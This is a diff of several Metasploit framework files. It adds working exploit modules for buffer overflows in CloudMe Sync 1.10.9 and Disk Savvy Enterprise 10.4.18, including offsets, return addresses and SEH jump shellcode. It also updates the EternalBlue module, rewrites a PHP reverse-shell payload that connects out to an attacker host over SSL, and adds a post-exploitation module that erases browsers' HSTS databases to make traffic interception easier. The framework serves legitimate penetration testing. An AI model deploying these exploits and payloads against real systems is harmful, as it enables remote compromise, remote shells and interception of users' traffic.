include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CloudMe Sync v1.10.9',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in CloudMe Sync v1.10.9 client application. This module has been
tested successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hyp3rlinx', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'References' =>
[
[ 'CVE', '2018-6892'],
[ 'EDB', '44027' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00",
},
'Targets' =>
[
[ 'CloudMe Sync v1.10.9',
{
'Offset' => 2232,
'Ret' => 0x61e7b7f6
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Jan 17 2018',
'DefaultTarget' => 0))
register_options([Opt::RPORT(8888)])
end
def exploit
connect
buffer = make_nops(target['Offset'])
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
sock.put(buffer)
handler
end
end

77
modules/exploits/windows/misc/disk_savvy_adm.rb Normal file
View File

@ -0,0 +1,77 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Savvy Enterprise v10.4.18',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in Disk Savvy Enterprise v10.4.18, caused by improper bounds
checking of the request sent to the built-in server. This module
has been tested successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira'
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x02\x0a\x0d\xf8",
'Space' => 800
},
'Targets' =>
[
[ 'Disk Savvy Enterprise v10.4.18',
{
'Offset' => 124,
'Ret' => 0x10056d13
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Jan 31 2017',
'DefaultTarget' => 0))
register_options([Opt::RPORT(9124)])
end
def exploit
seh = generate_seh_record(target.ret)
connect
buffer = make_nops(target['Offset'])
buffer << seh
buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh
buffer << "\x83\xc4\x21" #ADD esp,21h
buffer << "\xff\xe4" #JMP esp
buffer << payload.encoded
buffer << Rex::Text.rand_text_alphanumeric(1)
header = "\x75\x19\xba\xab"
header << "\x03\x00\x00\x00"
header << "\x00\x40\x00\x00"
header << [buffer.length].pack("V")
header << [buffer.length].pack("V")
header << [buffer[-1].ord].pack("V")
packet = header
packet << buffer
sock.put(packet)
handler
end
end

20
modules/exploits/windows/smb/ms17_010_eternalblue.rb
View File

@ -60,6 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => 5,
},
'Privileged' => true,
'Payload' =>
@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
# we don't need this sleep, and need to find a way to remove it
# problem is session_count won't increment until stage is complete :\
secs = 0
while !session_created? and secs < 5
while !session_created? and secs < 30
secs += 1
sleep 1
end
@ -139,16 +140,24 @@ class MetasploitModule < Msf::Exploit::Remote
rescue EternalBlueError => e
print_error("#{e.message}")
return false
rescue ::RubySMB::Error::NegotiationFailure
print_error("SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.")
return false
rescue ::RubySMB::Error::UnexpectedStatusCode,
::Errno::ECONNRESET,
::Rex::HostUnreachable,
::Rex::ConnectionTimeout,
::Rex::ConnectionRefused => e
::Rex::ConnectionRefused,
::RubySMB::Error::CommunicationError => e
print_error("#{e.class}: #{e.message}")
report_failure
return false
rescue => error
print_error(error.class.to_s)
print_error(error.message)
print_error(error.backtrace.join("\n"))
return false
ensure
# pass
end
@ -286,6 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
'''
#
# Increase the default delay by five seconds since some kernel-mode
# payloads may not run immediately.
@ -293,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote
def wfs_delay
super + 5
end
'''
def smb2_grooms(grooms, payload_hdr_pkt)
grooms.times do |groom_id|
@ -337,7 +347,11 @@ class MetasploitModule < Msf::Exploit::Remote
vprint_status("Sending malformed Trans2 packets")
sock.put(trans2_pkt_nulled)
begin
sock.get_once
rescue EOFError
vprint_error("No response back from SMB echo request. Continuing anyway...")
end
client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
end

4
modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
View File

@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 132
CachedSize = 253
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
@ -49,6 +49,6 @@ module MetasploitModule
lhost = datastore['LHOST']
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
end
end

130
modules/post/multi/manage/hsts_eraser.rb Normal file
View File

@ -0,0 +1,130 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Windows::UserProfiles
include Msf::Post::OSX::System
include Msf::Post::Unix
def initialize(info = {})
super(update_info(info,
'Name' => 'Web browsers HSTS entries eraser',
'Description' => %q{
This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,
Google Chrome, Opera, Safari and wget.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
],
'Platform' => %w(linux osx unix win),
'Arch' => [ARCH_X86,ARCH_X64],
'References' =>
[
[ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
[ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
],
'SessionTypes' => %w(meterpreter shell)
))
register_options([
OptBool.new('DISCLAIMER',
[true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])
])
end
def run
unless (datastore['DISCLAIMER'] == true)
print_error("This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.")
return
end
profiles = user_profiles
profiles.each do |user_profile|
account = user_profile['UserName']
browsers_hsts_db_path = {}
case session.platform
when 'windows'
browsers_hsts_db_path = {
'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",
'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", #Just path for now
'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity"
}
when 'unix', 'linux'
browsers_hsts_db_path = {
'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity",
'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now
'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity",
'wget' => "#{user_profile['LocalAppData']}/.wget-hsts"
}
when 'osx'
browsers_hsts_db_path = {
'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity",
'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", #Just path for now
'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity",
'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist"
}
else
print_error "Platform not recognized: #{session.platform}"
end
browsers_hsts_db_path.each_pair do |browser, path|
if browser == 'Firefox'
hsts_db_path = []
if directory?(path)
files = dir(path)
files.reject! { |file| %w(. ..).include?(file) }
files.each do |file_path|
hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/)
end
end
path = hsts_db_path[0]
end
if !path.nil? and file?(path)
print_status "Removing #{browser} HSTS database for #{account}... "
file_rm(path)
end
end
end
print_status "HSTS databases removed! Now enjoy your favorite sniffer! ;-)"
end
def user_profiles
user_profiles = []
case session.platform
when /unix|linux/
user_names = dir("/home")
user_names.reject! { |u| %w(. ..).include?(u) }
user_names.each do |user_name|
user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}")
end
when /osx/
user_names = session.shell_command("ls /Users").split
user_names.reject! { |u| u == 'Shared' }
user_names.each do |user_name|
user_profiles.push(
'UserName' => user_name,
"AppData" => "/Users/#{user_name}/Library",
"LocalAppData" => "/Users/#{user_name}/Library/Application Support"
)
end
when /windows/
user_profiles |= grab_user_profiles
else
print_error "Error getting user profile data!"
end
user_profiles
end
def system_separator
return session.platform == 'windows' ? '\\' : '/'
end
end

4
plugins/wmap.rb
View File

@ -140,11 +140,11 @@ class Plugin::Wmap < Msf::Plugin
end
when '-d'
del_idx = args
if del_idx
if !del_idx.empty?
delete_sites(del_idx.select {|d| d =~ /^[0-9]*$/}.map(&:to_i).uniq)
return
else
print_error("Provide index of site to delete")
print_error("No index provided.")
end
when '-l'
view_sites

22
spec/modules/payloads_spec.rb
View File

@ -1971,6 +1971,28 @@ RSpec.describe 'modules/payloads', :content do
reference_name: 'osx/x64/exec'
end
context 'osx/x64/meterpreter/bind_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/osx/x64/bind_tcp',
'stages/osx/x64/meterpreter'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'osx/x64/meterpreter/bind_tcp'
end
context 'osx/x64/meterpreter/reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/osx/x64/reverse_tcp',
'stages/osx/x64/meterpreter'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'osx/x64/meterpreter/reverse_tcp'
end
context 'osx/x64/meterpreter_reverse_http' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [